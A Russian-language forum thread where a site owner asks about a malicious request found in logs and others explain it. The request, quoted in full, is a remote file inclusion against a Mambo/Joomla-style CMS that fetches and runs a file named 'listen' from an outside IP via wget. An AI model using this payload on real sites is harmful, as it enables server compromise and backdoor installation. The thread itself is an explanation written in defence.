setcms.org/index.php?option=com_c...&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|

что это значит они взломать хотят узнав куки?

куки тут непричём.
поясняю пошагово:
...mosConfig_absolute_path=http://81.174.26.111/cmd.gif - это php-инклуюдинг.

далее идут команды:
cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
заходят во временную папку /tmp/ через сайт.. скачивают файл listen, ставят чмод на этот файл 744, запускают listen.. дальше хз чё.. вывод YYY)
зы: listen - может оказаться бекдором, руткитом, эксплоитом... и т.д.

http://81.174.26.111/

Можешь посмотреть. Шелл они уже кстати удалили.

походу человек даже с античата

Зависит ли результат выполнения такого запроса от содержимого файла index.php ??? И если да то сто вы могужете порекомендовать, для предотвращения подобных запросов .